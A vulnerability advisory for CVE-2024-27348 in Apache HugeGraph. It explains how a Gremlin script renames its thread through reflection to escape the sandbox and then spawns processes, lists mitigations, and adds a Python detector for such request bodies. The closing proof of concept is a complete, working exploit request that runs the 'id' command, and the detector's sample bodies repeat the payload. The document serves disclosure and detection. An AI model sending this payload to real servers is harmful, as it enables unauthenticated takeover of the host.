Apache HugeGraph Unauthenticated RCE – CVE-2024-27348

Vulnerable Version

>= 1.0.0, < 1.3.0 (Java 8 and Java 11 builds)

Fixed Version

1.3.0

Base Score

9.8 Critical

Vendor Description:-

HugeGraph is a powerful, open-source graph database designed to handle large-scale graph data and complex graph queries with high performance. Developed by the team at Baidu, HugeGraph supports a variety of data models and query languages, including Gremlin, Cypher, and SPARQL, allowing for flexible and efficient data management. Its origins trace back to Baidu’s need for a scalable and efficient graph database solution to power its own applications.

CVE-2024-27348 Vulnerability Description:-

A remote code execution vulnerability exists in the Gremlin API of HugeGraph Server. Gremlin is a graph traversal language with implementations in several host languages, including Groovy, Python, and Java. Because HugeGraph ships with authentication disabled, an unauthenticated attacker who can reach the REST port can submit Groovy-based Gremlin scripts to the API, and those scripts can be used to execute arbitrary operating system commands.

Apache HugeGraph installs a custom SecurityManager (HugeSecurityManager) that is meant to sandbox the Groovy scripts users submit. The sandbox is only enforced, however, for threads whose name starts with "gremlin-server-exec" or "task-worker"; any other thread is left unrestricted. A submitted script can obtain the current Thread object, use reflection to overwrite its private name field, and thereby step outside the set of names the sandbox checks. From that point on the script can use reflection to instantiate java.lang.ProcessBuilder and start arbitrary processes.

Gremlin:- Gremlin is a versatile graph traversal language integral to the Apache TinkerPop project, enabling efficient and expressive graph queries and analytics across a range of graph databases and computing frameworks.

Impacts:-

  • Remote Code Execution (RCE) → Attackers can run arbitrary OS commands, leading to server compromise.
  • Data Theft & Manipulation → Sensitive graph database data can be accessed, modified, or deleted.
  • Privilege Escalation → If HugeGraph runs with high privileges, attackers may gain control over the entire system.
  • Persistence & Lateral Movement → The attacker can establish backdoors and pivot to other internal services.

Mitigations:-

  • Apply Patch: The most effective mitigation is to update Apache HugeGraph Server to version 1.3.0 or newer, where the vulnerability has been fixed. Check for updates regularly and apply them promptly.
  • Run on Java 11: The project recommends running HugeGraph 1.3.0 on Java 11. Upgrading the JDK alone does not remove the flaw (both the Java 8 and Java 11 builds of affected versions are vulnerable), so treat this as a companion to the patch, not a substitute.
  • Gremlin Input Validation: Restrict what reaches the Gremlin endpoint, for example by allowing only plain traversals and rejecting scripts that reference java.lang.reflect, Thread internals, ProcessBuilder or Runtime. Treat this as defense in depth only: Groovy scripts can be obfuscated, so pattern matching cannot replace the patch or authentication.
  • Monitor Activity: Log the bodies of POST /gremlin requests and alert on scripts that use reflection, rename threads, or spawn processes; a legitimate traversal has no reason to do any of these.
  • Enable User Authentication: HugeGraph ships with authentication disabled, so the Gremlin endpoint is open to anyone who can reach port 8080. Enable it by editing the configuration file (hugegraph.properties) to set auth.enable=true, use the Java 11 build as recommended, and additionally restrict network access to the REST port to trusted clients.
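The following is an added example, not code from the original post or from the HugeGraph project, showing what the "Gremlin Input Validation" and "Monitor Activity" items above look like in practice. It takes the raw JSON bodies of POST /gremlin requests (assumed to come from a reverse proxy or application log that records request bodies) and flags the thread-rename reflection pattern used by this CVE as well as generic process spawning. The sample bodies are constructed for the example.

```python
"""Flag Gremlin API request bodies that carry the CVE-2024-27348 bypass pattern.

Added example (not the original post's or HugeGraph's code). Input is the raw
JSON body of each POST /gremlin request; where those bodies come from is an
assumption about the deployment's logging.
"""
import json
import re

# Indicators, in order of specificity. Groovy scripts can be obfuscated, so
# treat these as high-signal alerts rather than as a complete allowlist.
INDICATORS = {
    # Overwriting the private Thread.name field: the exact bypass used by this CVE.
    "thread_rename": re.compile(r'getDeclaredField\s*\(\s*["\']name["\']\s*\)'),
    # Reflection that a graph traversal has no reason to use.
    "reflection": re.compile(r'Class\.forName|setAccessible\s*\(\s*true\s*\)|getDeclaredField'),
    # Process spawning, with or without reflection.
    "process_exec": re.compile(r'ProcessBuilder|Runtime\.getRuntime\s*\(|\.exec\s*\('),
}


def analyze_request(body: str) -> dict:
    """Return the matched indicators and a severity for one /gremlin JSON body."""
    try:
        req = json.loads(body)
    except json.JSONDecodeError:
        # Malformed bodies are not an exploit attempt by themselves, but are worth noting.
        return {"language": None, "hits": [], "severity": "none", "error": "body is not JSON"}
    if not isinstance(req, dict):
        return {"language": None, "hits": [], "severity": "none", "error": "body is not a JSON object"}
    script = req.get("gremlin", "")
    hits = [name for name, rx in INDICATORS.items() if rx.search(script)]
    if "thread_rename" in hits or "process_exec" in hits:
        severity = "high"      # sandbox bypass or command execution
    elif "reflection" in hits:
        severity = "medium"    # reflection alone: review, may be a precursor
    else:
        severity = "none"
    return {"language": req.get("language"), "hits": hits, "severity": severity}


def scan(bodies):
    """Indices of the bodies that should page someone (severity high)."""
    return [i for i, b in enumerate(bodies) if analyze_request(b)["severity"] == "high"]


# Constructed sample bodies for the example: a normal traversal, the CVE payload,
# reflection without process spawning, and a malformed body.
SAMPLE_BODIES = [
    json.dumps({"gremlin": "g.V().hasLabel('person').limit(5)",
                "bindings": {}, "language": "gremlin-groovy", "aliases": {}}),
    json.dumps({"gremlin": 'Thread t = Thread.currentThread(); '
                           'java.lang.reflect.Field f = Class.forName("java.lang.Thread").getDeclaredField("name"); '
                           'f.setAccessible(true); f.set(t, "SL7"); '
                           'new ProcessBuilder(["id"]).start()',
                "bindings": {}, "language": "gremlin-groovy", "aliases": {}}),
    json.dumps({"gremlin": "Class.forName('java.lang.System').getMethod('getenv').invoke(null)",
                "bindings": {}, "language": "gremlin-groovy", "aliases": {}}),
    "this is not a JSON body",
]

if __name__ == "__main__":
    for i, body in enumerate(SAMPLE_BODIES):
        print(i, analyze_request(body))
    print("alert on:", scan(SAMPLE_BODIES))
```

Run it against real logs by replacing SAMPLE_BODIES with the request bodies from your proxy; the "medium" tier exists so that reflection-only scripts are reviewed without drowning the high-confidence hits.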

POC:-

Send a Gremlin query through the Gremlin API endpoint to execute arbitrary commands:

POST /gremlin HTTP/1.1
Host: localhost:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: */*
Accept-Language: en-US, en; q=0.5
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1
Priority: u=0, i
Content-Type: application/json
Content-Length: 777

{
    "gremlin": "Thread thread = Thread.currentThread(); Class clz = Class.forName(\"java.lang.Thread\"); java.lang.reflect.Field field = clz.getDeclaredField(\"name\"); field.setAccessible(true); field.set(thread, \"SL7\"); Class processBuilderClass = Class.forName(\"java.lang.ProcessBuilder\"); java.lang.reflect.Constructor constructor = processBuilderClass.getConstructor(java.util.List.class); java.util.List command = java.util.Arrays.asList(\"id\"); Object processBuilderInstance = constructor.newInstance(command); java.lang.reflect.Method startMethod = processBuilderClass.getMethod(\"start\"); org.apache.commons.io.IOUtils.toString(startMethod.invoke(processBuilderInstance).getInputStream());",
    "bindings": {},
    "language": "gremlin-groovy",
    "aliases": {}
}

Reference:-

https://github.com/vulhub/vulhub/tree/master/hugegraph/CVE-2024-27348
